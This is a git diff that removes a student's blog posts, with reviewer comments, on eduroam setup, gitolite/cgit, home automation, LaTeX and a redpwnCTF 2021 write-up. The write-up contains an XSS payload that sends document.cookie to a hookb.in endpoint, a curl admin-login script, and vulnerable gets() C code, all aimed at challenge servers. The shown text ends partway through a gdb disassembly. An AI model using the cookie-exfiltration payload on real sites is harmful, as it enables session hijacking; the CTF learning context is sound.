Diffstat (limited to 'posts')
-rw-r--r-- posts/avanswifi.md | 26
-rw-r--r-- posts/by-date.md | 12
-rw-r--r-- posts/by-title.md | 12
-rw-r--r-- posts/connect4.md | 17
-rw-r--r-- posts/git.md | 161
-rw-r--r-- posts/homeauto.md | 248
-rw-r--r-- posts/index.md | 25
-rw-r--r-- posts/latex.md | 120
-rw-r--r-- posts/redpwn2021.md | 775
-rw-r--r-- posts/scoop.md | 115
-rw-r--r-- posts/software.md | 275
-rw-r--r-- posts/style.scss | 19
12 files changed, 43 insertions, 1762 deletions
diff --git a/posts/avanswifi.md b/posts/avanswifi.md
deleted file mode 100644
index 11191fd..0000000
--- a/posts/avanswifi.md
+++ /dev/null
@@ -1,26 +0,0 @@
-[meta]: <title> (Avans wifi setup)
-[meta]: <subtitle> (How to use Avans eduroam with NetworkManager)
-[meta]: <author> (Loek)
-[meta]: <date> (September 9 2021)
-[meta]: <tags> (software)
-[meta]: <cover> (/img/avanswifi.png)
-
-I wasted 2 hours trying to set up my school's WiFi, so here's a quick reference
-for other students who might've tried connecting but ended up giving up.
-
-```
-$ nmcli connection edit type wifi
-nmcli> set 802-11-wireless.ssid eduroam
-nmcli> set 802-1x.eap peap
-nmcli> set 802-1x.phase2-auth mschapv2
-nmcli> set 802-1x.identity <avans username>
-nmcli> set 802-1x.password <avans password>
-nmcli> set wifi-sec.key-mgmt wpa-eap
-nmcli> save
-nmcli> activate
-```
-
-Keep in mind that your username isn't your student e-mail, but the first letter
-of your first name, and 7 characters from your last name, e.g. `Loek Le
-Blansch -> lblansch`.
-
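Review bot: the nmcli session in this removed post (`set 802-1x.eap peap` together with `set 802-1x.phase2-auth mschapv2`) never sets `802-1x.ca-cert` or `802-1x.domain-suffix-match`, so a client configured this way does not validate the RADIUS server and will run the MSCHAPv2 exchange with any access point that announces the `eduroam` SSID. If the post is being moved rather than dropped, add both settings to the relocated copy, and consider `802-1x.password-flags` so that `set 802-1x.password <avans password>` does not leave the account password in the saved connection profile.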
diff --git a/posts/by-date.md b/posts/by-date.md
new file mode 100644
index 0000000..2c47d18
--- /dev/null
+++ b/posts/by-date.md
@@ -0,0 +1,12 @@
+---
+title: post listing
+layout: default
+id: posts
+toc: false
+post: false
+---
+
+{% include posts.html
+ sort="date"
+%}
+
diff --git a/posts/by-title.md b/posts/by-title.md
new file mode 100644
index 0000000..db49dcd
--- /dev/null
+++ b/posts/by-title.md
@@ -0,0 +1,12 @@
+---
+title: post listing
+layout: default
+id: posts
+toc: false
+post: false
+---
+
+{% include posts.html
+ sort="title"
+%}
+
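Review bot: the front matter block here is the same as in posts/by-date.md (`title: post listing`, `id: posts`), so the two listing pages differ only in the `sort` argument passed to `posts.html`. Give each page a title that names its sort order so the two can be told apart in the browser tab and in generated navigation, and make `id` distinct as well unless it is deliberately shared as a styling hook.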
diff --git a/posts/connect4.md b/posts/connect4.md
deleted file mode 100644
index 89f8db2..0000000
--- a/posts/connect4.md
+++ /dev/null
@@ -1,17 +0,0 @@
-[meta]: <title> (Connect 4 beta live!)
-[meta]: <subtitle> (Announcement post)
-[meta]: <author> (Loek)
-[meta]: <date> (April 24 2021)
-[meta]: <tags> (connect 4, beta)
-[meta]: <cover> (/img/connectfourbeta.png)
-
-My connect four website is currently online as a public beta. You can visit the
-website at <https://connect4.pipeframe.xyz>. A list of known bugs is on the
-homepage, and all other issues should be submitted to
-[GitHub](https://github.com/lonkaars/connect-4/issues).
-
-If I encounter some very interesing bug that I think deserves it's own blog
-post I'll write one about it of course. I have one more week from now to worry
-about the connect four website, but after that I'm going to start preparing for
-my school exams.
-
diff --git a/posts/git.md b/posts/git.md
deleted file mode 100644
index 7d3ddbe..0000000
--- a/posts/git.md
+++ /dev/null
@@ -1,161 +0,0 @@
-[meta]: <title> (My git setup)
-[meta]: <subtitle> (How I use git on my server)
-[meta]: <author> (Loek)
-[meta]: <date> (April 28 2021)
-[meta]: <tags> (git, server, software)
-[meta]: <cover> (/img/git.png)
-
-## Overview
-
-I have two mechanisms set up for accessing my git server. I use gitolite for
-ssh access and permission management. I also have cgit set up which generates
-html pages for viewing your repositories and also hosts your repositories over
-http, or https if you have it set up.
-
-## SSH Access with gitolite
-
-Gitolite was a pain in the ass to set up because I didn't understand umasks
-before I started trying to set it up. A *umask* is like the opposite of what
-you'd enter when running `chmod`. For example: if I run `touch test`, I will
-now have a file with the same permissions as `chmod 644`. That looks something
-like this:
-
-```sh
-$ touch test
-$ ls -l
-total bla bla
--rw-r--r-- 1 loek users 0 Apr 28 12:28 test
-$ chmod 644 test
-$ ls -l
-total bla bla
--rw-r--r-- 1 loek users 0 Apr 28 12:28 test
-$ # notice the same permissions on the 'test' file
-```
-
-If I want gitolite to create repositories with default permissions so other
-users can read the repositories, I have to set my umask to the opposite of 644.
-Here's a quick explanation of `ls -l`'s output:
-
-```sh
--rw-r--r-- * user group size date time filename
-|└┬┘└┬┘└┬┘
-| | | └all users
-| | └owner group
-| └owner user
-└type
-```
-
-Each digit in a `chmod` command sets the permission for the file owner, file
-group, then everyone. That looks something like this:
-
-```sh
-$ chmod 644 test
-
-decimal: 6 4 4
-binary: 110 100 100
-ls -l: - rw- r-- r--
-```
-
-Then we take the opposite of this to get the umask:
-
-```sh
-$ chmod 755 directory -R
-
-ls -l: d rwx r-x r-x
-binary: 000 010 010
-decimal: 0 2 2
-```
-
-And now my `.gitolite.rc`:
-
-```perl
-%RC = (
- UMASK => 0022,
- ROLES => {
- READERS => 1,
- WRITERS => 1,
- },
-
- ENABLE => [
- 'ssh-authkeys',
- 'git-config',
- 'daemon',
- 'gitweb',
- ],
-);
-
-1;
-```
-
-## HTTP(S) Access with cgit
-
-Cgit is probably the easiest thing to set up. It has great built-in
-documentation (`man 5 cgitrc`). Pretty much all configuration is in
-`/etc/cgitrc` (css/syntax highlighting isn't in there). The only reason I'm
-posting my config here is because for some reason, the order of the options in
-cgit's config matters:
-
-```rc
-#
-# cgit config
-# see cgitrc(5) for details
-
-cache-size=0
-enable-commit-graph=1
-
-css=/cgit.css
-logo=/cgit.png
-
-virtual-root=/
-remove-suffix=1
-
-root-title=git :tada:
-
-##
-## List of common mimetypes
-##
-mimetype.gif=image/gif
-mimetype.html=text/html
-mimetype.jpg=image/jpeg
-mimetype.jpeg=image/jpeg
-mimetype.pdf=application/pdf
-mimetype.png=image/png
-mimetype.svg=image/svg+xml
-
-# Highlight source code with python pygments-based highlighter
-source-filter=/usr/lib/cgit/filters/syntax-highlighting.py
-
-# Format markdown, restructuredtext, manpages, text files, and html files
-# through the right converters
-about-filter=/usr/lib/cgit/filters/about-formatting.sh
-
-##
-## Search for these files in the root of the default branch of repositories
-## for coming up with the about page:
-##
-readme=:README.md
-readme=:readme.md
-readme=:README.rst
-readme=:readme.rst
-readme=:README.txt
-readme=:readme.txt
-readme=:README
-readme=:readme
-readme=:INSTALL.md
-readme=:install.md
-readme=:INSTALL.mkd
-readme=:install.mkd
-readme=:INSTALL.rst
-readme=:install.rst
-readme=:INSTALL.html
-readme=:install.html
-readme=:INSTALL.htm
-readme=:install.htm
-readme=:INSTALL.txt
-readme=:install.txt
-readme=:INSTALL
-readme=:install
-
-scan-path=/mnt/scf/git/repositories
-```
-
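Review bot: the umask walkthrough in this removed post contradicts itself: the prose says the umask is "the opposite of 644", but the worked example derives `0 2 2` from `chmod 755`, and the bitwise opposite of 644 is 133, not the value used in `UMASK => 0022`. If the post is kept elsewhere, state the rule as new files starting from 666 and new directories from 777 with the umask bits cleared, which is why 022 gives 644 files and 755 directories. Next to `scan-path=/mnt/scf/git/repositories` it is also worth saying that cgit lists every repository found under that path, so the world-readable umask and the scan path together decide what gets published.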
diff --git a/posts/homeauto.md b/posts/homeauto.md
deleted file mode 100644
index 35d8d12..0000000
--- a/posts/homeauto.md
+++ /dev/null
@@ -1,248 +0,0 @@
-[meta]: <title> (My home automation adventure)
-[meta]: <subtitle> (How to make your house a shitty utopia)
-[meta]: <author> (Loek)
-[meta]: <date> (August 17 2021)
-[meta]: <tags> (home automation, raspberry pi, esp8266, cc2500, microcontrollers, software, hardware, hacking)
-[meta]: <cover> (/img/homeauto.png)
-
-Home automation is cool, but it can also be scary. I want to try to convert my
-existing bedroom lights into 'smart' lights that I can control using a home
-automation system.
-
-I've tried two home automation systems so far: homebridge and home assistant.
-Homebridge isn't really an automation system. It's meant to add unsupported
-devices to *homekit*, but doesn't work with anything other than apple devices.
-I've also tried (and am currently using) home assistant. It's a complete
-replacement for the homekit ecosystem, and it can do basically anything, as
-long as you're patient enough...
-
-The devices I'm going to try to automate are:
-
-- A random bluetooth RGB/white lamp I bought a couple years back
-- An RGB strip under my bed my mom got me for christmas
-- A gen 1 Philips LivingColors lamp from 2008
-- My Toshiba RAS-M10GKV-E2 air conditioning unit
-
-## Bluetooth RGB lamp
-
-This lamp is apparently another Chinese product that gets rebranded and sold
-under different names. I bought mine as the "[Shada led's
-light](http://leds-lightpro.com/node/4368)" (no the apostrophe isn't a typo).
-
-When scanning for bluetooth devices using `bluetoothctl` on Linux, it shows up
-as an LE device called "Beken LED".
-
-I don't remember what search term I used when searching for it's bluetooth
-protocol, but I landed on [this page](https://wiki.fhem.de/wiki/BEKEN_iLedBlub)
-from a german website about home automation, where it's called the "BEKEN
-iLedBulb". It documents which Bluetooth LE characteristics you need to write to
-for the lamp to change color.
-
-The lamp has both [iOS](https://apps.apple.com/us/app/leds-light/id1058642950)
-and
-[android](https://play.google.com/store/apps/details?id=com.shada.ledslight&hl=en_US&gl=US)
-apps available, though only the iOS app seemed to work.
-
-### Writing a homebridge plugin
-
-When I started out with this home automation business, I used homebridge
-because I didn't know about home assistant yet. Developing plugins for
-homebridge is actually pretty easy (after figuring out [how to get the plugin
-to load](https://github.com/homebridge/homebridge/issues/2958)). The
-documentation is pretty good, and it has typescript integration for maximum
-/comfy/-ness.
-
-Because HomeKit doesn't support RGBW or RGBWW lights (lights that have both rgb
-and dedicated white diodes), I chose to display them as seperate rgb and white
-lamps inside the home app.
-
-[The plugin](https://www.npmjs.com/package/homebridge-beken) is pretty janky,
-and requires some manual setup, but it worked very consistently for the single
-week I used it for.
-
-### Converting the homebridge plugin to home assistant
-
-Now that I could control a single bulb using the home app and siri, I needed
-more. The homebridge website allows for turning devices on/off, but doesn't
-allow color changes. I also liked the idea of controlling the lights using my
-phone, which runs android.
-
-Home assistant was the solution, so I went ahead and installed [home assistant
-core](https://www.home-assistant.io/installation/linux#install-home-assistant-core)
-on the Raspberry Pi 3B+ I'm using as a dedicated home automation hub.
-
-Upon opening it for the first time, I noticed it was much slower than
-homebridge, but that's because it was installing a bunch of other stuff in the
-background. After waiting for the background tasks to complete, I was greeted
-with a very nice web interface. There were also already devices that I could
-integrate immediately, like the downstairs chromecasts, and my Jellyfin server.
-
-Now I had to figure out how to write a plugin for home assistant. There's some
-concepts in the home assistant ecosystem that I didn't quite understand, which
-made searching where to start harder.
-
-**Integrations** are like plugins, they allow you to *integrate* an unsupported
-device into home assistant. Integrations create **devices** which create
-**entities** (device properties). Certain entity types can only be read (like
-`sensor`), and others can also be updated / written to (lights).
-
-The documentation for creating entity integrations is pretty poopy, and I
-mostly used other plugins on GitHub as reference material. The home assistant
-plugin code is available on
-[GitHub](https://github.com/lonkaars/homeassistant-beken) and [my personal git
-server](https://git.pipeframe.xyz/lonkaars/homeassistant-beken/about).
-
-## RGB gamer bed
-
-I was originally planning to control this strip using IR remote emulation, but
-I remembered a friend of mine still had an esp8266 laying around. So I went the
-extra mile and wanted to try to create a new driver board for the strip
-instead.
-
-### Opening the original driver
-
-![](/img/homeauto/controller_original.jpg)
-
-![](/img/homeauto/opening_controller.jpg)
-
-![](/img/homeauto/open_controller.jpg)
-
-![](/img/homeauto/controller_board.jpg)
-
-### Making a custom driver board
-
-**I AM NOT AN ELECTRICIAN**. I looked on the internet, and I think this is just
-a simple board with some mosfets and flash memory for storing the 6 custom
-colors. The mosfets are the 3 big squares labeled Q1, Q2 and Q3. The way the
-strip works is it gets +12v though the black wire, and then lights up when you
-ground any combination of the red, green, and blue wires. The strip dims using
-pulse width modulation. The mosfets act like an electronic switch, and control
-the grounding of the colored wires.
-
-I'm going to salvage the mosfets, and barrel plug from the original driver
-board, and resolder them on a perfboard with the esp8266 so I can control them
-over WiFi. The schematic I'm using comes from
-[instructables](https://www.instructables.com/WiFi-Controlled-RGB-LED-Strip-With-ESP8266/).
-
-![](/img/homeauto/schematic.png)
-
-The whole solder job was a complete massacre, and I really don't want to show
-it. It does work though, but I had to buy a new soldering station because my
-old soldering iron wasn't really fit for soldering small electronics.
-
-### Beautiful dremel work
-
-I wanted to use the original enclosure instead of a tupperware container this
-time, so I used my dad's dremel to create holes for the esp to fit.
-
-![](/img/homeauto/shittydremel.png)
-
-![](/img/homeauto/espfit.png)
-
-As you can see I did a great job :^)
-
-The esp is still at the bottom of the case, but getting everything to fit
-inside was so hard that I completely forgot to take pictures. So here's a
-picture of the finished controller mounted under my bed using two small nails:
-
-![Job well done](/img/homeauto/finishedcontroller.png)
-
-### ESP firmware
-
-The firmare I wrote for the esp is available on
-[GitHub](https://github.com/lonkaars/esp8266-rgbstrip) and [my git
-server](https://git.pipeframe.xyz/lonkaars/esp8266-rgbstrip/about), along with
-the home assistant plugin
-([GitHub](https://github.com/lonkaars/hass-esp8266-rgbstrip),
-[cgit](https://git.pipeframe.xyz/lonkaars/hass-esp8266-rgbstrip/about)). I used
-the [espressif ESP8266_RTOS_SDK](https://github.com/espressif/ESP8266_RTOS_SDK)
-toolchain with gnu make as my build system.
-
-It just connects to your specified wifi network under your specified hostname,
-and listens on port 80 for regular http requests. Here's how to use it without
-the home assistant plugin:
-
-```bash
-# get color
-curl http://hostname/
-
-# set color rrggbb color (hex)
-curl -X POST -d "0000ff" http://hostname/
-```
-
-Some cool features this firmare has are:
-
-- Linearly interpolated color transitions with customizable transition and step
- duration
-- Brightness curve correction (makes difference in brightness more pronounced
- at higher brightness levels by using a parabolic curve)
-
-I'm not sure if the more popular [ESPHome](https://esphome.io/) firmare has
-these features, but I wanted to have a go at writing my own firmare anyways.
-
-### Safety
-
-Because the esp8266 is a pretty basic microcontroller, it doesn't use https or
-ssl for encryption. To protect from people in my house wanting to control my
-lights, I used the raspberry pi's onboard wifi module to create a hidden
-private isolated wifi network for this, and all future IoT devices in my
-bedroom. I'm using `hostapd` to create the wifi network, and `dnsmasq` for
-assigning ip addresses and hostname resolution. Here's the config file for
-`dnsmasq`:
-
-```
-no-resolv
-interface=wlan0
-dhcp-range=10.0.0.1,10.0.0.16,24h
-server=8.8.8.8
-```
-
-And here's `hostapd`'s config file:
-
-```bash
-# common settings
-interface=wlan0
-driver=nl80211
-ssid=network_name_here
-hw_mode=g
-channel=1
-macaddr_acl=0
-auth_algs=1
-ignore_broadcast_ssid=1
-wpa=2
-wpa_passphrase=network_password_here
-wpa_key_mgmt=WPA-PSK
-rsn_pairwise=CCMP
-
-# raspberry pi 3b+ specific settings
-ieee80211n=1 # 802.11n support
-wmm_enabled=1 # QoS support
-ht_capab=[HT40+][SHORT-GI-20][DSSS_CCK-40]
-```
-
-Very complicated stuff...
-
-## Philips LivingColors lamp
-
-[This](http://www.knutsel.org/2009/01/01/livingcolors-1st-generation/) article
-describes all the research that went into reverse-engineering the lamp.
-
-I ordered a cc2500 wireless transmitter and receiver, but the seller cancelled
-the order, and now I have to wait a while longer to get one. I'll update this
-article once I've set it up though.
-
-## Toshiba air conditioning unit
-
-I created a small daughter board to connect to the raspberry pi's gpio pins,
-that has an IR phototransistor and IR blaster. This is so I could record and
-replay the IR messages from the remote more easily.
-
-I've spent a solid two days now trying to use my raspberry pi or arduino uno as
-a janky logic analyzer, to capture the IR messages and get the message contents
-manually, but I still haven't succeeded. I have however succeeded in frying the
-IR LED by giving it +5v backwards without any protection, so that's something I
-guess. I'll update this section of the article together with the Philips lamp.
-
-
-To be continued...
-
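Review bot: the Safety section of this removed post counts `ignore_broadcast_ssid=1` as part of the protection, but a hidden SSID still appears in probe and association frames; the setting that actually keeps other people in the house off the network is `wpa=2` with `wpa_passphrase`, and the firmware itself accepts an unauthenticated `curl -X POST -d "0000ff" http://hostname/` from any device that joins. If the post is republished, say that plainly and revisit the dnsmasq file: `dhcp-range=10.0.0.1,10.0.0.16,24h` starts at .1, which collides with the access point if wlan0 holds that address, and `server=8.8.8.8` forwards client DNS queries upstream, so the "isolated" network still has a path out through the Pi.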
diff --git a/posts/index.md b/posts/index.md
deleted file mode 100644
index 50894f5..0000000
--- a/posts/index.md
+++ /dev/null
@@ -1,25 +0,0 @@
-[meta]: <title> (Loek's excruciatingly interesting blog)
-[meta]: <subtitle> (This is the article that's displayed on the home page)
-[meta]: <author> (Loek)
-[meta]: <date> (April 12 2021)
-[meta]: <tags> (home)
-[meta]: <cover> (/img/helloworld.png)
-
-Welcome to my blog page! This is where I post updates on things that I do such
-as:
-
-- Cool open source software that I think you should use
-- How to set up self-hosted applications
-- Rants about Microsoft Windows
-- Maybe some recipes I dunno
-
-The page you're looking at right now is also open-source! The code for this
-page can be found on [GitHub](https://github.com/lonkaars/blog), and should
-also be available on [my private git server](https://git.pipeframe.xyz).
-
-An rss/atom feed of this blog is also available:
-
-```
-https://blog.pipeframe.xyz/atom.xml
-```
-
diff --git a/posts/latex.md b/posts/latex.md
deleted file mode 100644
index 4234c84..0000000
--- a/posts/latex.md
+++ /dev/null
@@ -1,120 +0,0 @@
-[meta]: <title> (My LaTeX setup)
-[meta]: <subtitle> (How to set up a simple LaTeX environment with XeTeX and latexmk)
-[meta]: <author> (Loek)
-[meta]: <date> (January 24 2022)
-[meta]: <tags> (software, latex, git)
-[meta]: <cover> (/img/latex.png)
-
-I started using LaTeX instead of MS Word about two years ago, and I've never
-regretted the decision. I switched out of frustration because Word makes it
-really easy to mess up your document structure without you noticing.
-
-## Cool features LaTeX gets you
-
-- Automatically numbered figures with references that automatically update
-- Really simple bibliography management with `biblatex`
-- Packages that help you typeset scientific things like chemistry or physics
-- Professional looking output documents with very little effort
-- Automation of repetitive things with macros
-- It's a plain text format, so it works well with `git` or other version
- control software
-- Probably more
-
-## Installation
-
-This guide is for Arch Linux and it's derivatives, but you can use
-[pkgs.org](https://pkgs.org) to find the mentioned packages if they're under a
-different name in your distro's package manager.
-
-### Required packages
-
-- `biber`
-- `texlive-most`, containing:
- - `texlive-bibtexextra`
- - `texlive-core `
- - `texlive-fontsextra `
- - `texlive-formatsextra`
- - `texlive-games`
- - `texlive-humanities`
- - `texlive-latexextra`
- - `texlive-music`
- - `texlive-pictures`
- - `texlive-pstricks`
- - `texlive-publishers`
- - `texlive-science`
-- `latex-mk`
-
-tl;dr
-
-```
-# pacman -S texlive-most biber latex-mk
-```
-
-### Force XeTeX compiler with latexmk
-
-To force latexmk to use the `xelatex` compiler instead of `pdflatex` you can
-create `~/.config/latexmk/latexmkrc` with the following content:
-
-```
-$pdflatex = "xelatex %O %S";
-$pdf_mode = 1;
-$dvi_mode = 0;
-$postscript_mode = 0;
-```
-
-
-## Hello world
-
-LaTeX uses a lot of auxiliary files for compilation, so it's a good idea to
-create a new directory for every document. After creating a new directory,
-create a .tex file and open it with a text editor.
-
-```tex
-\documentclass[12pt, a4paper, dutch]{article}
-\usepackage[margin=1in]{geometry}
-\usepackage{babel}
-
-\bigskipamount=7mm
-\medskipamount=4mm
-\parindent=0mm
-
-\begin{document}
-Hello world!
-\end{document}
-```
-
-This is the starting point I generally use for all my documents. It uses a4
-paper and 2.54cm margins, which is the default in Word (in Europe). Because
-most of my documents are in Dutch, I add the `dutch` option to my document
-class, and import the babel package for correct word breaking and built-in
-latex heading translations. I also disable paragraph indenting, and modify the
-`\bigskip` and `\medskip` distances.
-
-After creating the .tex file, you can run `latexmk <your .tex file>` to compile
-the document. When it's done, you should have a new .pdf file in your directory
-with the same name as the .tex file.
-
-Keep in mind that you can probably install an extension for your text editor to
-have it automatically compile and refresh your document for you. If you're
-using Visual Studio Code, you can use the [LaTeX
-Workshop](https://marketplace.visualstudio.com/items?itemName=James-Yu.latex-workshop)
-extension, and for vim I use [vimtex](https://github.com/lervag/vimtex) with
-[coc-vimtex](https://github.com/neoclide/coc-vimtex) for
-[coc](https://github.com/neoclide/coc.nvim).
-
-## Notes
-
-### LaTeX and git
-
-Because LaTeX creates a lot of temporary files, you should add the following to
-your repository's `.gitignore`:
-
-```gitignore
-**/*.aux
-**/*.fdb_latexmk
-**/*.fls
-**/*.log
-**/*.out
-**/*.synctex.gz
-```
-
diff --git a/posts/redpwn2021.md b/posts/redpwn2021.md
deleted file mode 100644
index 97ee0a9..0000000
--- a/posts/redpwn2021.md
+++ /dev/null
@@ -1,775 +0,0 @@
-[meta]: <title> (redpwnCTF 2021)
-[meta]: <subtitle> (A noob's perspective)
-[meta]: <author> (Loek, Willem)
-[meta]: <date> (July 13 2021)
-[meta]: <tags> (hacking, CTF, writeup)
-[meta]: <cover> (/img/redpwn2021.png)
-
-This is the first 'real' CTF I've participated in. About two weeks ago, a
-friend of mine was stuck on some challenges from the Radboud CTF. This was a
-closed CTF more geared towards beginners (high school students), and only had a
-few challenges which required deeper technical knowledge of web servers and
-programming. Willem solved most of the challenges, and I helped solve 3 more.
-
-Apart from those challenges, basically all my hacking knowledge comes from
-computerphile videos, liveoverflow videos and making applications myself.
-
-> epic announcement!!!
->
-> Willem has added explanations of the challenges he solved, so go read them!
-
-## Challenges
-
-### web/pastebin-1
-
-This challenge is a simple XSS exploit. The website that's vulnerable is
-supposed to be a clone of pastebin. I can enter any text into the paste area,
-and it will get inserted as HTML code into the website when someone visits the
-generated link.
-
-The challenge has two sites: one with the pastebin clone, and one that visits
-any pastebin url as the website administrator. The goal of this challenge is
-given by it's description:
-
-> Ah, the classic pastebin. Can you get the admin's cookies?
-
-In JS, you can read all cookies without the `HttpOnly` attribute by reading
-`document.cookie`. This allows us to read the cookies from the admin's browser,
-but now we have to figure out a way to get them sent back to us.
-
-Luckily, there's a free service called [hookbin](https://hookbin.com/) that
-gives you an http endpoint to send anything to, and look at the request
-details.
-
-Combining these two a simple paste can be created:
-
-```html
-<script>
- var post = new XMLHttpRequest();
- post.open("post", "https://hookb.in/<endpoint url>");
- post.send(document.cookie);
-</script>
-```
-
-### crypto/scissor
-
-I wasn't planning on including this one, but it makes use of the excellent
-[CyberChef](https://gchq.github.io/CyberChef/) tool. The flag is given in the
-challenge description, and is encrypted using a ceasar/rot13 cipher. A simple
-python implementation of this cipher is included with the challenge, but I just
-put it into CyberChef and started trying different offsets.
-
-### rev/wstrings
-
-> Some strings are wider than normal...
-
-This challenge has a binary that uses a simple `strcmp` to check the flag. When
-running the program, the following output is visible:
-
-```sh
-# ./wstrings
-Welcome to flag checker 1.0.
-Give me a flag>
-```
-
-My first stategy was running the `strings` utility on the `wstrings` binary,
-but I didn't find the flag. What was interesting to me though was that I also
-couldn't find the prompt text... This immediately made me check for other
-string encodings.
-
-Running the `strings` utility with the `-eL` flag tells `strings` to look for
-32-bit little-endian encoded strings, and lo and behold the flag shows up!
-
-This is because ascii strings are less 'wide' than 32-bit strings:
-
-```
- --- ascii ---
-
-hex -> 0x68 0x65 0x6c 0x6c 0x6f
-str -> h e l l o
-```
-
-Notice how each character is represented by a single byte each (8 bits) in
-ascii, as opposed to 32-bit characters in 32-bit land.
-
-```
- --- 32-bit land ---
-
-hex -> 0x00000068 0x00000065 0x0000006c 0x0000006c 0x0000006f
-str -> h e l l o
-```
-
-I think 32-bit strings also have practical use for things like non-English
-texts such as Hebrew, Chinese or Japanese. Those characters take up more space
-anyways, and you would waste less space by not using unicode escape characters.
-
-### web/secure
-
-> Just learned about encryption—now, my website is unhackable!
-
-This challenge is pretty simple if you know some of JS's quirks. Right at the
-top of the file is an sqlite3 expression in JS:
-
-```js
-////////
-db.exec(`INSERT INTO users (username, password) VALUES (
- '${btoa('admin')}',
- '${btoa(crypto.randomUUID)}'
-)`);
-```
-
-This section of code immediately jumped out to me because I noticed that
-`crypto.randomUUID` wasn't actually being called.
-
-Because the 'random uuid' is being fed into `btoa()` it becomes a base64
-encoded string. However, `btoa()` also expects a string as input. Because every
-object in JS has a `.toString()` method, when you pass it into a function
-expecting another type, JS will happily convert it for you without warning.
-
-This means that the admin's password will always be a base64-encoded version of
-`crypto.randomUUID`'s source code. We can get that base64-encoded source code
-by running the following in a NodeJS REPL:
-
-```js
-// import file system and crypto modules
-var writeFileSync = require('fs').writeFileSync;
-var crypto = require('crypto');
-
-// write source to file
-writeFileSync('./randomUUID.js', btoa(crypto.randomUUID.toString()), 'utf-8');
-```
-
-I made a simple shell script that calls cURL with the base64-encoded
-parameters, and decodes the url-encoded flag afterwards:
-
-```sh
-#!/bin/sh
-
-# https://stackoverflow.com/questions/6250698/how-to-decode-url-encoded-string-in-shell
-function urldecode() { : "${*//+/ }"; echo -e "${_//%/\\x}"; }
-
-urldecode $(curl -sX POST \
- -d "username=$(printf 'admin' | base64)" \
- -d "password=$(cat ./randomUUID.js)" \
- https://secure.mc.ax/login)
-```
-
-### crypto/baby
-
-> I want to do an RSA!
-
-This challenge is breaking RSA. It only works because the `n` parameter is
-really small.
-
-Googling for 'rsa decrypt n e c' yields
-[this](https://stackoverflow.com/questions/49878381/rsa-decryption-using-only-n-e-and-c)
-stackoverflow result, which links to
-[dcode.fr](https://www.dcode.fr/rsa-cipher). The only thing left to do is
-calculate `p` and `q`, which can be done using [wolfram
-alpha](https://wolframalpha.com/).
-
-### pwn/beginner-generic-pwn-number-0
-
-> rob keeps making me write beginner pwn! i'll show him...
->
-> `nc mc.ax 31199`
-
-This was my first interaction with `gdb`. It was.. painful. After begging for
-help in the redpwnCTF discord server about another waaaay harder challenge, an
-organizer named asphyxia pointed me towards [gef](https://github.com/hugsy/gef)
-which single-handedly saved my sanity during the binary exploitation
-challenges.
-
-The first thing I did was use [iaito](https://github.com/radareorg/iaito) to
-look at a disassembly graph of the binary. Iaito is a graphical front-end to
-the radare2 reverse engineering framework, and I didn't feel like learning two
-things at the same time, so that's why I used it. While it's very
-user-friendly, I didn't look into reverse engineering tools very much, and
-didn't realise that iaito is still in development. Let's just say I ran into
-some issues with project saving so I took lots of unnecessary repeated steps.
-
-After trying to make sense of assembly code after just seeing it for the first
-time, I instead decided looking at the source code would be a better idea since
-I actually know c.
-
-```c
-#include <stdio.h>
-#include <string.h>
-#include <stdlib.h>
-
-const char *inspirational_messages[] = {
- "\"𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨\"",
- "\"𝘱𝘭𝘦𝘢𝘴𝘦 𝘸𝘳𝘪𝘵𝘦 𝘢 𝘱𝘸𝘯 𝘴𝘰𝘮𝘦𝘵𝘪𝘮𝘦 𝘵𝘩𝘪𝘴 𝘸𝘦𝘦𝘬\"",
- "\"𝘮𝘰𝘳𝘦 𝘵𝘩𝘢𝘯 1 𝘸𝘦𝘦𝘬 𝘣𝘦𝘧𝘰𝘳𝘦 𝘵𝘩𝘦 𝘤𝘰𝘮𝘱𝘦𝘵𝘪𝘵𝘪𝘰𝘯\"",
-};
-
-int main(void)
-{
- srand(time(0));
- long inspirational_message_index = rand() % (sizeof(inspirational_messages) / sizeof(char *));
- char heartfelt_message[32];
-
- setbuf(stdout, NULL);
- setbuf(stdin, NULL);
- setbuf(stderr, NULL);
-
- puts(inspirational_messages[inspirational_message_index]);
- puts("rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!");
- puts("can you write me a heartfelt message to cheer me up? :(");
-
- gets(heartfelt_message);
-
- if(inspirational_message_index == -1) {
- system("/bin/sh");
- }
-}
-```
-
-After looking at this source things became a lot clearer, because the only
-input you can actually control is received from `gets(...);`
-
-Now comes the hard part: doing it, but in assembly!
-
-Some resources you should consume before attempting binary exploitation would
-be [computerphile's video on buffer
-overflows](https://www.youtube.com/watch?v=1S0aBV-Waeo) and
-[cheat.sh/gdb](https://cheat.sh/gdb) for some basic gdb commands. The rest of
-this section assumes you know the basics of both buffer overflows and gdb.
-
-First, let's print a disassembly of the `int main()` function:
-
-```
-(gdb) disas main
-Dump of assembler code for function main:
- 0x000000000040127c <+134>: call 0x4010a0 <puts@plt>
- 0x0000000000401281 <+139>: lea rdi,[rip+0xec8] # 0x402150
- 0x0000000000401288 <+146>: call 0x4010a0 <puts@plt>
- 0x000000000040128d <+151>: lea rdi,[rip+0xf1c] # 0x4021b0
- 0x0000000000401294 <+158>: call 0x4010a0 <puts@plt>
- 0x0000000000401299 <+163>: lea rax,[rbp-0x30]
- 0x000000000040129d <+167>: mov rdi,rax
- 0x00000000004012a0 <+170>: call 0x4010f0 <gets@plt>
- 0x00000000004012a5 <+175>: cmp QWORD PTR [rbp-0x8],0xffffffffffffffff
- 0x00000000004012aa <+180>: jne 0x4012b8 <main+194>
- 0x00000000004012ac <+182>: lea rdi,[rip+0xf35] # 0x4021e8
- 0x00000000004012b3 <+189>: call 0x4010c0 <system@plt>
- 0x00000000004012b8 <+194>: mov eax,0x0
- 0x00000000004012bd <+199>: leave
- 0x00000000004012be <+200>: ret
-End of assembler dump.
-```
-
-This isn't the full output from gdb, but only the last few lines. A few things
-should immediately stand out: the 3 `<puts@plt>` calls, and right after the
-call to `<gets@plt>`. These are the assembly equivalent of:
-
-```c
-puts(inspirational_messages[inspirational_message_index]);
-puts("rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!");
-puts("can you write me a heartfelt message to cheer me up? :(");
-
-gets(heartfelt_message);
-```
-
